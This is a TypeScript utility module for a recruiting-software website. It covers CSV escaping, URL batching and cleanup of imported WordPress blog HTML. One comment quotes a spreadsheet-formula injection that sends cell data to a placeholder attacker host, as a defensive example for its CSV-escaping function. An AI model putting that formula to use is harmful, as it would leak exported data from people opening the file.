import { clsx, type ClassValue } from "clsx"
import { twMerge } from "tailwind-merge"
// Relative (same directory) rather than the "@/" alias: next.config.ts imports this map too, and
// the alias is not resolved when Next evaluates its config.
import { resolveLegacyPath } from "./legacyRedirects"

export function cn(...inputs: ClassValue[]) {
  return twMerge(clsx(inputs))
}

export function stripHtmlTags(html: string): string {
  return html.replace(/<[^>]*>/g, '');
}

/**
 * Trim to at most `max` characters on a word boundary, appending an ellipsis when cut.
 *
 * PERF: card excerpts from the DB average ~430 chars but render under `line-clamp-2` (~120
 * visible), and every character crosses the server->client boundary in the RSC payload.
 */
export function truncateWords(text: string, max: number): string {
  if (text.length <= max) return text;
  const cut = text.slice(0, max);
  const lastSpace = cut.lastIndexOf(' ');
  return `${(lastSpace > max * 0.6 ? cut.slice(0, lastSpace) : cut).trimEnd()}…`;
}

/** Split an array into chunks of `size` — for batching large DB request *bodies*. */
export function chunk<T>(arr: T[], size: number): T[][] {
  const out: T[][] = [];
  for (let i = 0; i < arr.length; i += size) out.push(arr.slice(i, i + size));
  return out;
}

/**
 * Byte budget for the ids we pack into one PostgREST `?col=in.(…)` filter.
 *
 * The origin behind landings-api drops any request whose URL passes ~1,700 bytes;
 * Cloudflare surfaces that as a 502 whose error page carries no CORS headers, so the
 * browser reports it as a CORS failure and the real cause is invisible (measured
 * 2026-09-04: 1,697-byte URL → 200, 1,783-byte URL → 502).
 *
 * This budget covers only the ids, so it has to leave room for the rest of the request.
 * The longest `.in()` base URL in the app is ~430 bytes — `campaign_enrollments` with
 * useCampaignDeliverability's FULL_SELECT, which embeds two joins — so 900 puts the worst
 * case near 1,330 bytes. A larger budget still fits today but leaves too little margin on
 * a limit we neither control nor chose.
 */
export const URL_ID_BUDGET = 900;

/**
 * Split ids that travel in a query string into URL-safe batches — by encoded byte cost,
 * not by count, since a uuid costs ~42 bytes and an email address varies. Use this for
 * every `.in()` on a GET/DELETE/PATCH; `chunk()` is still right for insert/upsert bodies.
 */
export function chunkForUrl(items: string[], budget = URL_ID_BUDGET): string[][] {
  const out: string[][] = [];
  let current: string[] = [];
  let cost = 0;
  for (const item of items) {
    // `"item",` once PostgREST-quoted and percent-encoded: %22 … %22%2C
    const itemCost = encodeURIComponent(item).length + 9;
    if (current.length > 0 && cost + itemCost > budget) {
      out.push(current);
      current = [];
      cost = 0;
    }
    current.push(item);
    cost += itemCost;
  }
  if (current.length > 0) out.push(current);
  return out;
}

/** Values starting with one of these are executed as a formula by Excel, LibreOffice
 *  Calc and Google Sheets rather than shown as text. Quoting per RFC 4180 does not stop
 *  it — the quotes are stripped when the cell is parsed. */
const CSV_FORMULA_PREFIX = /^[=+\-@\t\r]/;

/**
 * Escape one value for a CSV cell.
 *
 * Every admin export here is built from data submitted through a public, unauthenticated
 * endpoint — demo bookings, newsletter signups, contact forms, leads. A company name of
 * `=WEBSERVICE("http://attacker/?d="&A1)` is stored verbatim and runs the moment an admin
 * opens the exported file, with no prompt in current Excel. The leading tab is the OWASP
 * mitigation: it makes the value a text cell and is invisible once rendered.
 *
 * `alwaysQuote` picks the dialect. Default (false) quotes only when the value contains a
 * delimiter, which is what an export that gets re-imported needs — `contactImport` parses
 * its own output. Pass true to quote unconditionally, which is what the campaign exports
 * already did.
 */
export function csvEscape(value: unknown, alwaysQuote = false): string {
  const s = value == null ? '' : String(value);
  const safe = CSV_FORMULA_PREFIX.test(s) ? `\t${s}` : s;
  if (!alwaysQuote && !/[",\n\r\t]/.test(safe)) return safe;
  return `"${safe.replace(/"/g, '""')}"`;
}

/** The real `{ error }` message from a failed `supabase.functions.invoke`. A FunctionsHttpError's
 *  `.message` is always the generic "non-2xx status code"; the edge function's own error lives in
 *  the JSON body on `error.context`. Falls back to `.message`, then `fallback`. */
export async function functionErrorMessage(error: unknown, fallback = 'Something went wrong'): Promise<string> {
  let msg = (error as { message?: string })?.message ?? fallback;
  try {
    const ctx = (error as { context?: Response })?.context;
    if (ctx && typeof ctx.json === 'function') {
      const body = await ctx.json();
      if (body?.error) msg = body.error;
    }
  } catch { /* keep default */ }
  return typeof msg === 'string' ? msg : fallback;
}

/** Copy text to clipboard. Falls back to execCommand for non-secure contexts (HTTP on LAN). */
export async function copyToClipboard(text: string): Promise<void> {
  if (navigator.clipboard && window.isSecureContext) {
    await navigator.clipboard.writeText(text);
    return;
  }
  const el = document.createElement('textarea');
  el.value = text;
  el.style.cssText = 'position:fixed;left:-9999px;top:-9999px;opacity:0';
  document.body.appendChild(el);
  el.focus();
  el.select();
  const ok = document.execCommand('copy');
  document.body.removeChild(el);
  if (!ok) throw new Error('execCommand copy failed');
}

export function decodeHtmlEntities(text: string): string {
  if (typeof window === 'undefined') return text;
  const doc = new DOMParser().parseFromString(text, 'text/html');
  return doc.documentElement.textContent || text;
}

const NAMED_HTML_ENTITIES: Record<string, string> = {
  '&amp;': '&', '&lt;': '<', '&gt;': '>', '&quot;': '"', '&#39;': "'", '&apos;': "'",
  '&nbsp;': ' ', '&hellip;': '…', '&#8217;': '’', '&#8216;': '‘',
  '&#8220;': '“', '&#8221;': '”', '&#8211;': '–', '&#8212;': '—',
};

/**
 * Pure-string entity decode — identical output on server and client, unlike
 * `decodeHtmlEntities` (which relies on DOMParser and no-ops during SSR). Use this
 * when decoded text is rendered in a server-rendered component to avoid a
 * hydration mismatch between the raw-entity SSR output and the decoded CSR output.
 */
export function decodeHtmlEntitiesSSR(text: string): string {
  return text
    .replace(/&#x([0-9a-fA-F]+);/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)))
    .replace(/&#(\d+);/g, (_, dec) => String.fromCharCode(Number(dec)))
    .replace(/&[a-zA-Z]+;/g, (entity) => NAMED_HTML_ENTITIES[entity] ?? entity);
}

// SSR-safe alternative to stripTableOfContents below (which no-ops on the server
// since it needs DOMParser) — pure string ops, counts nested <div> depth to find
// the real end of the Easy-TOC container instead of a naive single-level regex.
// Blog article pages are server components, so this is what actually runs there;
// EnhancedTableOfContents renders its own TOC from the same content, and without
// this the CMS's original Easy-TOC block also ships in post.content, giving two.
export function stripTableOfContentsSSR(html: string): string {
  if (!html) return html;
  const startMatch = html.match(/<div[^>]*id=["']ez-toc-container["'][^>]*>/i);
  if (!startMatch || startMatch.index === undefined) {
    return stripDedivvedTableOfContents(
      html.replace(/<div[^>]*\bclass=["'][^"']*\bez-toc[^"']*["'][^>]*>[\s\S]*?<\/div>\s*/gi, ''),
    );
  }
  const start = startMatch.index;
  let depth = 1;
  const tagRe = /<\/?div\b[^>]*>/gi;
  tagRe.lastIndex = start + startMatch[0].length;
  let match: RegExpExecArray | null;
  let end = html.length;
  while ((match = tagRe.exec(html))) {
    depth += match[0].startsWith('</') ? -1 : 1;
    if (depth === 0) {
      end = match.index + match[0].length;
      break;
    }
  }
  return html.slice(0, start) + html.slice(end);
}

/**
 * Remove an Easy-TOC block that has lost its `<div>` wrapper.
 *
 * WHY: the block above is found by its container div, but a body can reach us with every `<div>`
 * already unwrapped, leaving a TOC the container search cannot see:
 *
 *     <p>Table of Contents</p>
 *     <p><a class="ez-toc-pull-right ... ez-toc-toggle" href="#">Toggle</a></p>
 *     <ul><li><p><a class="ez-toc-link ez-toc-heading-1" href="...#Frag">Heading</a></p></li>...</ul>
 *
 * That shape is what the platform admin editor produces: ProseMirror has no generic `div` node,
 * so it drops the wrapper and keeps the children (it also drops the `id` attributes and the
 * `<span class="ez-toc-section">` anchors, which is why the surviving links are dead -- on the
 * post that surfaced this, 0 of 6 fragment targets resolved). The editor bug itself is fixed at
 * src/components/blog/RichTextEditor.tsx, but rows written before that fix keep this shape, so
 * the renderer has to cope.
 *
 * Conservative by construction -- a list is only removed when EVERY anchor in it is an
 * `ez-toc-link`, so a genuine list that merely follows the TOC survives; and the bare
 * "Table of Contents" label is only removed when a TOC list was actually found, so a post that
 * writes that phrase in prose is untouched.
 *
 * `<span class="ez-toc-section">` anchors are deliberately left alone: they are invisible and,
 * in the undamaged shape, carry the heading ids that in-page links point at.
 */
function stripDedivvedTableOfContents(html: string): string {
  if (!/ez-toc-(?:link|toggle)/i.test(html)) return html;

  let out = html;
  let removedList = false;

  // Lists whose anchors are ALL ez-toc-link entries.
  out = out.replace(/<(ul|ol)\b[^>]*>[\s\S]*?<\/\1\s*>/gi, (list) => {
    const anchors = list.match(/<a\b[^>]*>/gi) ?? [];
    if (!anchors.length) return list;
    const allToc = anchors.every((a) => /\bez-toc-link\b/i.test(a));
    if (!allToc) return list;
    removedList = true;
    return '';
  });

  // The "Toggle" control, and the paragraph that only wrapped it.
  out = out.replace(
    /<p\b[^>]*>\s*(?:<[^/][^>]*>\s*)*<a\b[^>]*\bez-toc-toggle\b[^>]*>[\s\S]*?<\/a>\s*(?:<\/[^>]+>\s*)*<\/p\s*>/gi,
    '',
  );
  out = out.replace(/<a\b[^>]*\bez-toc-toggle\b[^>]*>[\s\S]*?<\/a\s*>/gi, '');

  // The orphaned label, only once we know a TOC was really here.
  if (removedList) {
    out = out.replace(/<p\b[^>]*>(?:\s|&nbsp;|<br\s*\/?>)*Table\s+of\s+Contents(?:\s|&nbsp;|:)*<\/p\s*>/gi, '');
  }

  return out;
}

// Migrated CMS content still contains hard-coded `http://hirebee.ai` links
// (Semrush audit 2026-08: HTTPS pages linking to HTTP). Rewrite same-site links
// to https so the internal links stop triggering the mixed-scheme warning and
// don't cost an extra redirect hop. Also collapses the www host to the apex.
export function sanitizeContentHtml(html: string): string {
  if (!html) return html;
  return relativizeSameSiteHrefs(
    html
      .replace(/http:\/\/www\.hirebee\.ai/gi, 'https://hirebee.ai')
      .replace(/http:\/\/hirebee\.ai/gi, 'https://hirebee.ai')
      .replace(/https:\/\/www\.hirebee\.ai/gi, 'https://hirebee.ai'),
  );
}

/**
 * Turn absolute same-site hrefs into root-relative ones and drop the WordPress trailing slash.
 *
 * WHY: WP wrote every internal link as an absolute URL ending in a slash, and this app serves
 * the non-slash form -- so `https://hirebee.ai/business-type-.../` costs a 308 on every click.
 * The visible damage is on in-page anchors: the Easy-TOC on
 * /blog/how-startups-have-been-winning-during-a-global-pandemic links to
 * `https://hirebee.ai/blog/how-startups-.../#A_time_to_prepare_and_organize`, so what should be
 * an instant scroll becomes a redirect and a full page reload. Reduced to
 * `/blog/how-startups-...#A_time_to_prepare_and_organize` the path matches the current document
 * and the browser just scrolls. (The heading ids themselves are fine -- all six resolve.)
 *
 * Deliberately scoped to `href="..."` rather than a blanket host replace: the same string can
 * appear in body text, and rewriting prose to a bare path would be wrong. Query and fragment
 * are preserved; only a trailing slash on the path is removed, and the bare root stays `/`.
 */
function relativizeSameSiteHrefs(html: string): string {
  return html.replace(/href="https:\/\/hirebee\.ai([^"]*)"/gi, (_match, rest: string) =>
    `href="${normalizeSameSiteHref(rest || '/')}"`,
  );
}

/**
 * Analytics parameters that describe how a visitor arrived. They are meaningless on a link from
 * our own content to our own page, and one of them is actively wrong: two customer-story links in
 * /blog/ai-candidate-screening-how-hirebee-transforms-hiring carry `utm_source=chatgpt.com`,
 * i.e. someone pasted a URL copied out of ChatGPT, which then attributes our own internal
 * traffic to ChatGPT. Only stripped from SAME-SITE hrefs -- an external link's parameters may be
 * functional (an affiliate id, a vendor's campaign landing page) and are left untouched.
 */
const TRACKING_PARAM_RE = /^(utm_[a-z_]+|gclid|fbclid|msclkid|mc_cid|mc_eid|ref|_hs[a-z]*)$/i;

/** Normalize one same-site href: legacy path -> current path, no trailing slash, no tracking. */
function normalizeSameSiteHref(raw: string): string {
  const hashAt = raw.indexOf('#');
  const fragment = hashAt >= 0 ? raw.slice(hashAt) : '';
  let beforeHash = hashAt >= 0 ? raw.slice(0, hashAt) : raw;

  const queryAt = beforeHash.indexOf('?');
  const rawQuery = queryAt >= 0 ? beforeHash.slice(queryAt + 1) : '';
  if (queryAt >= 0) beforeHash = beforeHash.slice(0, queryAt);

  let path = beforeHash || '/';
  if (path.length > 1) path = path.replace(/\/+$/, '') || '/';

  // Legacy WP path -> its current home, so the link stops costing a 301. Exact matches only;
  // see resolveLegacyPath in src/lib/legacyRedirects.ts.
  path = resolveLegacyPath(path) ?? path;

  // `&amp;` is how the stored HTML separates params; treat it as a separator and re-emit it.
  const kept = rawQuery
    ? rawQuery
        .split(/&amp;|&/)
        .filter(Boolean)
        .filter((pair) => !TRACKING_PARAM_RE.test(pair.split('=')[0]))
    : [];
  const query = kept.length ? `?${kept.join('&amp;')}` : '';

  return `${path}${query}${fragment}`;
}

/**
 * Rewrite root-relative in-content links that point at a legacy WordPress path.
 *
 * WHY: `relativizeSameSiteHrefs` only sees links written as absolute `https://hirebee.ai/...`.
 * Most legacy links in the CMS bodies are already root-relative (`/features/candidate-history`),
 * and those were the bulk of the 380 redirect-costing links the link audit found across 146
 * articles. Same normalization, applied to `href="/..."`.
 */
function rewriteLegacyRelativeHrefs(html: string): string {
  return html.replace(/href="(\/[^"]*)"/g, (match, href: string) => {
    // Protocol-relative URLs (`//host/path`) are not same-site paths.
    if (href.startsWith('//')) return match;
    const normalized = normalizeSameSiteHref(href);
    return normalized === href ? match : `href="${normalized}"`;
  });
}

/**
 * Unwrap links to the WordPress admin that were published in article bodies.
 *
 * WHY: the link audit found four live articles under /blog/the-ultimate-guide-to-candidate-survey/
 * linking to `/wp-admin/post.php?post=21841&action=edit` -- editor URLs that leaked into the
 * published copy. They currently 308 to a nonsense `/?post=21841&amp%3Baction=edit`. Nobody can
 * follow them anywhere useful, so the anchor goes and the text stays.
 */
function stripWpAdminLinks(html: string): string {
  if (!/wp-admin/i.test(html)) return html;
  return html.replace(
    /<a\b[^>]*href="[^"]*\/wp-admin\/[^"]*"[^>]*>([\s\S]*?)<\/a\s*>/gi,
    '$1',
  );
}

/**
 * Zero-width / invisible code points found in the WordPress-imported bodies, with the
 * percent-encoded form each one takes inside an `href` fragment.
 *
 * U+034F (COMBINING GRAPHEME JOINER) is the one that actually shows up at scale: 443 of them
 * scattered mid-word through `how-to-conduct-hr-compliance-risk-assessment-efficiently`
 * (`Fundame<CGJ>ntal`, `Effi<CGJ>cient`). Inserting invisible characters mid-word is a known
 * trick for defeating duplicate-content detection, so their presence is a strong signal the
 * text was spun or scraped. Three other posts carry a trivial 2-10 ZWSPs, most likely from
 * an editor paste rather than anything deliberate.
 */
const INVISIBLE_CHARS: Array<{ char: string; encoded: string }> = [
  { char: "͏", encoded: "%CD%8F" }, // combining grapheme joiner
  { char: "​", encoded: "%E2%80%8B" }, // zero-width space
  { char: "‌", encoded: "%E2%80%8C" }, // zero-width non-joiner
  { char: "‍", encoded: "%E2%80%8D" }, // zero-width joiner
  { char: "⁠", encoded: "%E2%81%A0" }, // word joiner
  { char: "﻿", encoded: "%EF%BB%BF" }, // zero-width no-break space / BOM
  { char: "­", encoded: "%C2%AD" }, // soft hyphen
  { char: "᠎", encoded: "%E1%A0%8E" }, // mongolian vowel separator
];

const INVISIBLE_LITERAL_RE = new RegExp(`[${INVISIBLE_CHARS.map((c) => c.char).join("")}]`, "g");
const INVISIBLE_ENCODED_RE = new RegExp(INVISIBLE_CHARS.map((c) => c.encoded).join("|"), "gi");

/**
 * Strip invisible code points from injected body content.
 *
 * WHY: they are invisible to a reader but not to a search engine. They break keyword matching
 * on any heading or sentence they land in, and they mark the text as manipulated.
 *
 * BOTH FORMS MUST GO TOGETHER. The Easy-TOC block that ships inside `post.content` links to
 * headings by fragment, and the two ends encode the same character differently: the heading
 * carries it literally (`id="Step_4_Assess_Compliance<CGJ><CGJ>_Practices"`) while the anchor
 * carries it percent-encoded (`href="...#Step_4_Assess_Compliance%CD%8F%CD%8F_Practices"`) --
 * 88 such hrefs on the compliance post alone. Stripping only the literal form would rewrite
 * every heading id and leave every TOC link pointing at an anchor that no longer exists.
 *
 * `EnhancedTableOfContents` is unaffected either way: it reads ids off the DOM at runtime and
 * scrolls with `getElementById`, so it follows whatever ids survive this transform.
 *
 * Content inside `<pre>`/`<code>` is left alone, matching `demoteContentHeadings` -- a snippet
 * deliberately demonstrating a zero-width character should not be silently rewritten.
 *
 * Note: ZWJ/ZWNJ are meaningful in Indic, Arabic and emoji sequences. Every body this runs over
 * is English-only today; revisit this list before the CMS serves another script.
 */
export function stripInvisibleChars(html: string): string {
  if (!html) return html;
  INVISIBLE_LITERAL_RE.lastIndex = 0;
  INVISIBLE_ENCODED_RE.lastIndex = 0;
  if (!INVISIBLE_LITERAL_RE.test(html) && !INVISIBLE_ENCODED_RE.test(html)) return html;

  const parts = html.split(/(<(?:pre|code)\b[\s\S]*?<\/(?:pre|code)>)/gi);
  return parts
    .map((part, i) =>
      // Odd indices are the captured pre/code blocks -- pass through untouched.
      i % 2 === 1 ? part : part.replace(INVISIBLE_LITERAL_RE, "").replace(INVISIBLE_ENCODED_RE, ""),
    )
    .join("");
}

/** Follow a `google.com/url?q=` wrapper down to the URL it actually points at. */
function resolveGoogleRedirect(url: string): string {
  let current = url;
  // Bounded: the observed content is doubly wrapped, the cap just stops a crafted cycle.
  for (let depth = 0; depth < 5; depth += 1) {
    const wrapper = current.match(/^https?:\/\/(?:www\.)?google\.[a-z.]+\/url\?(.*)$/i);
    if (!wrapper) break;
    // The stored HTML escapes its separators, so `&amp;` has to count as a param break.
    const query = wrapper[1].replace(/&amp;/gi, "&");
    const target = query.match(/(?:^|&)(?:q|url)=([^&]*)/i);
    if (!target) break;
    let next: string;
    try {
      next = decodeURIComponent(target[1]);
    } catch {
      next = target[1]; // malformed escape sequence -- keep the raw value
    }
    if (!/^https?:\/\//i.test(next)) break;
    current = next;
  }
  return current;
}

/**
 * Rewrite Google Docs redirector links to their real destinations.
 *
 * WHY: `/blog/recruitment-metrics-and-analytics/ai-in-hr-statistics` routes every one of its
 * 984 citation anchors through a *doubly nested* `google.com/url?q=...` wrapper -- the tell of
 * content pasted out of a Google Doc twice. The sources cited are good ones (75x McKinsey,
 * 39x Gartner, 36x Deloitte); bouncing them through Google's redirector wastes the outbound
 * signal, and leaves the page's entire citation apparatus pointing at a third party.
 */
export function unwrapGoogleRedirects(html: string): string {
  if (!html || !/google\.[a-z.]+\/url\?/i.test(html)) return html;
  return html.replace(/https?:\/\/(?:www\.)?google\.[a-z.]+\/url\?[^"'<>\s]+/gi, (match) =>
    // Re-escape separators: this value lands back inside an HTML attribute.
    resolveGoogleRedirect(match).replace(/&/g, "&amp;"),
  );
}

/**
 * Hosts whose links are unwrapped out of injected body content entirely.
 *
 * `winhubllc.com` was placed in `how-to-conduct-hr-compliance-risk-assessment-efficiently`
 * (published 2024-05-13, WordPress era) as `rel="noopener"` -- which is NOT `nofollow`, so it
 * passed PageRank -- on the exact-match commercial anchor "HR compliance". The target answers
 * crawlers with a 403. That is the shape of a bought placement, not a citation.
 *
 * Measured scope when this was added: 1 post out of 408. The other ~2,000 outbound links on the
 * blog are legitimate citations (shrm.org, bls.gov, eeoc.gov, dol.gov) and are left untouched.
 *
 * THE REST ARE DEAD DESTINATIONS, not placements. Checking all 301 unique external in-article
 * links across the 408 published posts found only these genuinely broken -- the other ~39 that
 * an automated checker flags are 401/403/429 anti-bot responses from live sites (ft.com,
 * mckinsey.com, dol.gov, indeed, glassdoor) that work fine for a human. Do NOT add those.
 *
 * A link to a dead host is worse than plain text: it costs the reader a broken tab and spends
 * crawl budget on a 404. Unwrapping keeps the sentence and loses nothing.
 */
export const LINK_DENYLIST = [
  "winhubllc.com", // 410 Gone. Bought placement -- see above.
  "angelicasong.com", // 404. Personal site, page removed; cited in the 2021 pandemic post.
  "artisticstrategies.com.sg", // NXDOMAIN. Consultancy domain lapsed; same post.
  // NXDOMAIN -- the EU retired this subdomain and ec.europa.eu/eures 404s too. This one is a
  // real citation rather than a placement, so replacing it with the current EU jobs URL would
  // be better than dropping it; that is an editorial call, and unwrapping is the safe default
  // until someone makes it.
  "eures.ec.europa.eu",
  // Live, but a dofollow link-building placement that names itself as one: the href carries
  // `?utm_source=spira&utm_medium=linkbuilding`, and it shipped with rel="noopener" (NOT
  // nofollow). Same class as winhubllc.com above.
  "employtest.com",
];

/**
 * Unwrap denylisted anchors, keeping their text.
 *
 * Removing the link rather than adding `rel="nofollow"` because the placement itself is the
 * problem and the destination is dead to crawlers -- there is nothing worth linking to. The
 * sentence still reads correctly without the anchor.
 *
 * Done at render time rather than by editing the row, for the reason given on
 * `demoteContentHeadings`: the DB is shared with the admin app, and `supabase/` here is
 * source-only so a data migration would not reach production from this repo anyway.
 */
export function stripInjectedLinks(html: string): string {
  if (!html) return html;
  return LINK_DENYLIST.reduce((acc, host) => {
    if (!acc.toLowerCase().includes(host)) return acc;
    const escaped = host.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
    return acc.replace(
      new RegExp(`<a\\b[^>]*href=["'][^"']*${escaped}[^"']*["'][^>]*>([\\s\\S]*?)<\\/a\\s*>`, "gi"),
      "$1",
    );
  }, html);
}

/**
 * The single cleanup chain for CMS body HTML.
 *
 * Exists because these transforms had drifted apart across call sites: `sanitizeContentHtml`
 * was applied on the nested blog route but not the top-level one, which is exactly why the
 * defects above survived on `/blog/how-to-conduct-hr-compliance-risk-assessment-efficiently`.
 * Route every `dangerouslySetInnerHTML` over CMS content through this so a new caller cannot
 * silently pick up a different subset.
 *
 * Order matters: invisible characters are stripped before the link passes so a denylisted host
 * cannot hide behind one, and before `demoteContentHeadings` so heading ids settle once.
 *
 * Image handling stays at the call site -- `optimizeContentImages` lives in `imageUtils` and is
 * not imported here to keep this module free of that dependency.
 */
export function renderContentHtml(html: string | null | undefined): string {
  return demoteContentHeadings(
    rewriteLegacyRelativeHrefs(
      stripWpAdminLinks(
        stripInjectedLinks(
          unwrapGoogleRedirects(
            stripInvisibleChars(sanitizeContentHtml(stripTableOfContentsSSR(html ?? ""))),
          ),
        ),
      ),
    ),
  );
}

/**
 * Demote any `<h1>` inside injected body content to `<h2>`.
 *
 * WHY: the CMS bodies carry their own top-level heading. `recruitment_features.content` starts
 * `<div class="feature-content"><h1>Audit Management</h1><h2>…`, which duplicates the h1 the page
 * template already renders -- so those pages shipped two competing h1s and no clear statement of
 * what the page is about. Measured against the live API: 150 of 220 published features, plus 7
 * /resources/* and at least one blog post. The bare `<h1>` with no class attribute in the built
 * HTML is the tell that it came from content, not from a component.
 *
 * Fixed at render time rather than in the data: the DB is shared with the admin app (an editor
 * pasting a heading would reintroduce it), and `supabase/` in this repo is source-only so a data
 * migration would not reach production from here anyway.
 *
 * Pure string transform, no DOM -- safe during SSR/SSG, unlike `stripTableOfContents` below which
 * needs a browser and no-ops on the server.
 *
 * Attributes are preserved (`<h1 class="x">` -> `<h2 class="x">`) so styling survives; only the
 * tag name changes. Content inside `<pre>`/`<code>` is left alone so a documented HTML example
 * showing an `<h1>` tag is not silently rewritten.
 */
export function demoteContentHeadings(html: string): string {
  if (!html || !/<h1[\s>]/i.test(html)) return html;

  // Split on pre/code blocks and only transform the segments between them.
  const parts = html.split(/(<(?:pre|code)\b[\s\S]*?<\/(?:pre|code)>)/gi);
  return parts
    .map((part, i) =>
      // Odd indices are the captured pre/code blocks -- pass through untouched.
      i % 2 === 1
        ? part
        : part.replace(/<h1(\s[^>]*)?>/gi, "<h2$1>").replace(/<\/h1\s*>/gi, "</h2>"),
    )
    .join("");
}

export function stripTableOfContents(html: string): string {
  // Remove Easy TOC plugin containers using DOM parsing for reliability
  if (typeof window === 'undefined') return html;
  
  try {
    const parser = new DOMParser();
    const doc = parser.parseFromString(html, 'text/html');
    
    // Remove by ID (handles nested divs properly)
    const tocContainer = doc.getElementById('ez-toc-container');
    if (tocContainer) {
      tocContainer.remove();
    }
    
    // Also remove any elements with ez-toc class
    const tocElements = doc.querySelectorAll('[class*="ez-toc"]');
    tocElements.forEach(el => el.remove());
    
    return doc.body.innerHTML;
  } catch (error) {
    // Fallback to regex if DOM parsing fails
    return html.replace(/<div[^>]*id=["']ez-toc-container["'][^>]*>[\s\S]*?<\/div>\s*(?:<\/div>)?/gi, '');
  }
}
